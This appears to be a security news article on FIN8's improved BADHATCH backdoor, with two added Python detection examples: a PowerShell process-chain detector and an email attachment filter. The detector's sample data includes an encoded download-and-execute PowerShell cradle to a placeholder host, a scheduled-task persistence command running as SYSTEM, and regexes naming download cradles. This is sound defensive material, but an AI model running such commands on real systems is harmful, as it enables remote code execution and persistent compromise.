
FIN8 Group Comes Back with Improved BADHATCH Kit

12-Mar-2021
3 min read


FIN8, a financially motivated hacker group, is back in action after a hiatus of about 18 months, and this time it is armed with a more powerful version of its backdoor, with improved capabilities such as screen capturing, proxy tunneling, theft of sensitive credentials, and fileless execution.

The group was first documented in 2016 by FireEye and is best known for its targeted attacks against the hospitality, retail, and entertainment industries, using a wide array of tricks such as spear phishing and malicious tools like PUNCHTRACK and BADHATCH to steal payment card data from point-of-sale (POS) systems.

"The FIN8 group is known for taking long breaks to improve TTPs and increase their rate of success," Bitdefender researchers said in a report published today. "The BADHATCH malware is a mature, highly advanced backdoor that uses several evasion and defense techniques. The new backdoor also attempts to evade security monitoring by using TLS encryption to conceal PowerShell commands."

Ever since BADHATCH was discovered in 2019, it has been deployed as an implant that can run attacker-supplied commands obtained from a remote server, inject rogue DLLs into a current process, collect various system information, and then exfiltrate data to the server. According to the researchers, the latest version of BADHATCH abuses a legitimate service named sslp.io to evade detection during deployment, using it to download a PowerShell script that executes the shellcode containing the BADHATCH DLL.

The PowerShell script is responsible not only for achieving persistence but also for privilege escalation, ensuring that all commands executed after the script runs operate as the SYSTEM user.
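The deployment chain described in the two paragraphs above (a PowerShell stage that downloads and runs further code, then achieves persistence and ends up running as SYSTEM) leaves a recognisable trace in process-creation telemetry. The following Python is an added example written for this page, not code from the Bitdefender report or from BADHATCH itself. It runs simple detection logic over constructed, Sysmon-style process-creation events: the event fields, the sample command lines, the placeholder URL and the scheduled-task persistence mechanism are all assumptions (the report does not name the persistence method), chosen to show what a detection rule for this pattern looks like.

```python
"""
Detection logic for a fileless PowerShell deployment chain (added example).
The events below are constructed and simplified; they imitate the fields of
Sysmon Event ID 1 (process creation) but are not real telemetry.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str
    user: str


# Regexes for the behaviours called out in the text: a hidden/encoded PowerShell
# stage, a download-and-execute cradle, and (assumed) persistence via a task.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Invoke-Expression|\bIEX\b", re.I)
PERSISTENCE = re.compile(
    r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask|New-Service|\\CurrentVersion\\Run", re.I)
SYSTEM_USER = r"NT AUTHORITY\SYSTEM"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def _enc(ps_text: str) -> str:
    """Build a PowerShell -EncodedCommand argument (UTF-16LE, base64) for the sample."""
    return base64.b64encode(ps_text.encode("utf-16-le")).decode()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except Exception:
        return None


def is_powershell(ev: ProcEvent) -> bool:
    return ev.image.lower().endswith(("powershell.exe", "pwsh.exe"))


def analyze(events):
    """Return (pid, indicator) pairs for every suspicious behaviour observed."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if is_powershell(ev):
            effective = ev.cmdline
            decoded = decode_encoded_command(ev.cmdline)
            if decoded:
                effective += " " + decoded  # inspect the decoded script too
                findings.append((ev.pid, "encoded_command"))
            if HIDDEN_WINDOW.search(ev.cmdline):
                findings.append((ev.pid, "hidden_window"))
            if DOWNLOAD_CRADLE.search(effective):
                findings.append((ev.pid, "download_cradle"))
        parent = by_pid.get(ev.ppid)
        if parent and is_powershell(parent):
            if PERSISTENCE.search(ev.cmdline):
                findings.append((ev.pid, "persistence_from_powershell"))
            # A SYSTEM child spawned by a user-level PowerShell is the
            # privilege jump the text describes.
            if ev.user.upper() == SYSTEM_USER.upper() and parent.user.upper() != SYSTEM_USER.upper():
                findings.append((ev.pid, "privilege_jump_to_system"))
    return findings


# Constructed sample events (hypothetical users, PIDs and URL). PID 200 is a
# benign interactive PowerShell; PIDs 300-302 form the suspicious chain.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe", r"CORP\alice"),
    ProcEvent(200, 100, POWERSHELL, "powershell.exe -NoProfile -Command Get-Date", r"CORP\alice"),
    ProcEvent(300, 100, POWERSHELL,
              "powershell.exe -w hidden -enc " + _enc(
                  "IEX (New-Object Net.WebClient).DownloadString('https://placeholder.example/stage.ps1')"),
              r"CORP\alice"),
    ProcEvent(301, 300, r"C:\Windows\System32\schtasks.exe",
              'schtasks.exe /create /tn Updater /tr "powershell -w hidden" /sc onlogon /ru SYSTEM',
              r"CORP\alice"),
    ProcEvent(302, 300, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami", r"NT AUTHORITY\SYSTEM"),
]

if __name__ == "__main__":
    for pid, indicator in analyze(SAMPLE_EVENTS):
        print(f"pid {pid}: {indicator}")
```

Decoding the encoded argument before matching matters: the download cradle in the sample is only visible after base64/UTF-16LE decoding, which is exactly why a rule that looks at the raw command line alone misses this stage. In a real pipeline the same functions would run over parsed Sysmon or EDR events rather than the constructed list.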

FIN8's second evasion trick involves disguising communications with the command-and-control (C2) server as legitimate HTTP requests. This latest wave of attacks is said to have taken place over the last year and to have targeted the retail, technology, insurance, and chemical industries in the U.S., Canada, South Africa, Puerto Rico, and other countries.

"Like most persistent and skilled cyber-crime actors, FIN8 operators are constantly refining their tools and tactics to avoid detection," the researchers said, while urging businesses to "separate the POS network from the ones used by employees or guests" and to filter out emails with malicious or suspicious attachments.
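The closing recommendation, filtering out emails with suspicious attachments, is a policy a mail gateway has to implement concretely. The Python below is an added example for this page, not code from the researchers or from any product; the extension lists, the sample attachments and the verdict names are assumptions. It classifies an attachment by its name and by its actual content, so that an executable renamed to a benign extension or an Office document carrying a VBA project is caught even when the file name looks harmless.

```python
"""
Attachment policy check for a mail gateway (added example, constructed samples).
Combines file-name rules with content sniffing so a mismatch between the two
is itself a reason to quarantine.
"""
import io
import zipfile

# Assumed policy: extensions that should never arrive by mail unchallenged.
BLOCKED_EXTENSIONS = {
    "exe", "scr", "pif", "com", "bat", "cmd", "js", "jse", "vbs", "vbe",
    "wsf", "hta", "ps1", "lnk", "docm", "xlsm", "pptm",
}
# Extensions commonly used as the decoy half of a double extension.
DECOY_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"}
# Leading bytes that identify the real container type.
MAGIC = {
    b"MZ": "pe_executable",
    b"\x7fELF": "elf_executable",
    b"%PDF": "pdf",
    b"PK\x03\x04": "zip_container",
    b"\xd0\xcf\x11\xe0": "ole_compound",
}


def sniff(data: bytes) -> str:
    """Identify the file type from its leading bytes, ignoring the name."""
    for prefix, label in MAGIC.items():
        if data.startswith(prefix):
            return label
    return "unknown"


def assess_attachment(filename: str, data: bytes):
    """Return ("allow" | "quarantine", [reasons]) for one attachment."""
    reasons = []
    parts = filename.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""

    if ext in BLOCKED_EXTENSIONS:
        reasons.append(f"blocked extension .{ext}")
    if len(parts) > 2 and parts[-2] in DECOY_EXTENSIONS:
        reasons.append("double extension")

    kind = sniff(data)
    if kind in ("pe_executable", "elf_executable") and ext not in {"exe", "dll", "scr", "com"}:
        reasons.append(f"{kind} content behind .{ext} extension")
    if kind == "zip_container":
        # Modern Office files are zip containers; a vbaProject.bin inside means
        # the document carries macros regardless of whether it is named .docx.
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                if any(name.lower().endswith("vbaproject.bin") for name in zf.namelist()):
                    reasons.append("Office document contains a VBA macro project")
        except zipfile.BadZipFile:
            reasons.append("corrupt zip container")

    return ("quarantine" if reasons else "allow", reasons)


def build_sample_docx(with_macro: bool) -> bytes:
    """Construct a minimal zip that imitates a .docx, optionally with a VBA project."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\x00placeholder\x00")
    return buf.getvalue()


# Constructed sample attachments; the bytes are placeholders, not real files.
SAMPLES = {
    "notes.txt": b"meeting notes",
    "report.pdf.exe": b"MZ\x90\x00placeholder",
    "photo.jpg": b"MZ\x90\x00placeholder",
    "invoice.docx": build_sample_docx(with_macro=True),
    "agenda.docx": build_sample_docx(with_macro=False),
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        verdict, why = assess_attachment(name, data)
        print(f"{name}: {verdict} {why}")
```

The content checks are the part worth keeping even if the extension lists are tuned: "photo.jpg" and "invoice.docx" pass every name-based rule and are only caught because the gateway looked inside the bytes.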